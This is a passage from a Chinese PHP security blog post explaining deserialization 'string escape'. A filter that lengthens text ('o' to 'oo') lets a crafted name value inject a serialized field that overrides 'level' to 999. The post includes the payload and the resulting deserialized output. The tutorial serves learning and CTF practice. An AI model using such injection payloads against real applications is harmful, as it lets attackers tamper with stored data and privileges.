<h2 id="替换后字符变长"><a href="#替换后字符变长" class="headerlink" title="替换后字符变长"></a>替换后字符变长</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">change</span>(<span class="params"><span class="variable">$str</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">	<span class="keyword">return</span> str_replace(<span class="string">"o"</span>, <span class="string">"oo"</span>, <span class="variable">$str</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>比如说上面这个函数, 把输入的字符串中的<code>o</code>替换成<code>oo</code><br>如果有这么个数组<code>array("name" =&gt; "kirito","level" =&gt; "18");</code>,<br>序列化之后就是<code>a:2:{s:4:"name";s:6:"kirito";s:5:"level";s:2:"18";}</code><br>再用上面的函数处理序列化字符串, 就会变成<code>a:2:{s:4:"name";s:6:"kiritoo";s:5:"level";s:2:"18";}</code>, 这里就会出现一个错误<code>s:6:"kiritoo"</code>, 长度应该为6的字符变成7了</p>
<p>逃逸逃逸, 目的就是逃出双引号, 如果我们的数组是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span>(</span><br><span class="line">	<span class="string">"name"</span> =&gt; <span class="string">'kiritooooooooooooooooooooooooo";s:5:"level";s:3:"999";}'</span>,</span><br><span class="line">	<span class="string">"level"</span> =&gt; <span class="string">'18'</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p>序列化之后就是<br><code>a:2:{s:4:"name";s:55:"kiritooooooooooooooooooooooooo";s:5:"level";s:3:"999";}";s:5:"level";s:2:"18";}</code></p>
<p>这里<code>name</code>里面本身就有双引号, 但是不能实现逃逸, 是因为反序列化时候, 会读取指定长度的字符后下一个字符是否是<code>"</code><br>就比如这里的<code>s:55:"kiritooooooooooooooooooooooooo";s:5:"level";s:3:"999";}"</code>,<br>读取55个字符<code>kiritooooooooooooooooooooooooo";s:5:"level";s:3:"999";}</code>后, 就剩下结尾的<code>"</code>, 所以中间的<code>"</code>并不影响反序列化</p>
<p>但如果将序列化之后的字符串进行替换操作, 将会变成<br><code>s:55:"kiritoooooooooooooooooooooooooooooooooooooooooooooooooo";s:5:"level";s:3:"999";}</code>, 现在再来看看读取55个字符后是啥, 我们发现<code>kiritoooooooooooooooooooooooooooooooooooooooooooooooooo</code>刚好就是55个字符, 而后面刚好就是一个<code>"</code>, 这意味着在反序列化的时候, 后面的<code>;s:5:"level";s:3:"999";}</code>则会逃逸出去, 被识别成序列化字符串的另一部分.(具体原因就是因为多出的<code>o</code>的长度刚好就是<code>";s:5:"level";s:3:"999";}</code>)的长度</p>
<p>最后, 我们来看看总的字符串处理完是怎样的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:2:{s:4:"name";s:55:"kiritoooooooooooooooooooooooooooooooooooooooooooooooooo";s:5:"level";s:3:"999";}";s:5:"level";s:2:"18";}</span><br></pre></td></tr></table></figure>
<p>反序列化有个特点, 当判断反序列化结束后, 后面的字符将会自动忽略, 那么这里反序列化就会只处理<br><code>a:2:{s:4:"name";s:55:"kiritoooooooooooooooooooooooooooooooooooooooooooooooooo";s:5:"level";s:3:"999";}</code><br>后面的<code>";s:5:"level";s:2:"18";}</code>会被自动忽略, 这样我们就成功通过控制<code>name</code>, 逃逸并修改了<code>level</code></p>
<p>将处理后的字符串反序列化的结果:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">array(2) { </span><br><span class="line">	["name"]=&gt; string(55) "kiritoooooooooooooooooooooooooooooooooooooooooooooooooo" 			["level"]=&gt; string(3) "999" </span><br><span class="line">} </span><br></pre></td></tr></table></figure>
<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><blockquote>
<p>y4爷爷的反序列化总结: <a target="_blank" rel="noopener" href="https://blog.csdn.net/solitudi/article/details/113588692?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161638163316780357284910%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&amp;request_id=161638163316780357284910&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_v1~rank_blog_v1-14-113588692.pc_v1_rank_blog_v1&amp;utm_term=show">https://blog.csdn.net/solitudi/article/details/113588692?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161638163316780357284910%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&amp;request_id=161638163316780357284910&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_v1~rank_blog_v1-14-113588692.pc_v1_rank_blog_v1&amp;utm_term=show</a></p>
<p>CRLF总结: <a target="_blank" rel="noopener" href="https://wooyun.js.org/drops/CRLF%20Injection%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90.html">https://wooyun.js.org/drops/CRLF%20Injection%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90.html</a></p>
</blockquote>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Web/" rel="tag"># Web</a>
              <a href="/tags/Unserialize/" rel="tag"># Unserialize</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/03/21/The-learning-of-php-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="prev" title="The learning of php 文件包含">
                  <i class="fa fa-angle-left"></i> The learning of php 文件包含
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/03/23/Noting-of-0CTF-2016-piapiapia/" rel="next" title="Noting of [0CTF 2016]piapiapia">
                  Noting of [0CTF 2016]piapiapia <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">K1rit0</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="Word count total">350k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">5:18</span>
  </span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
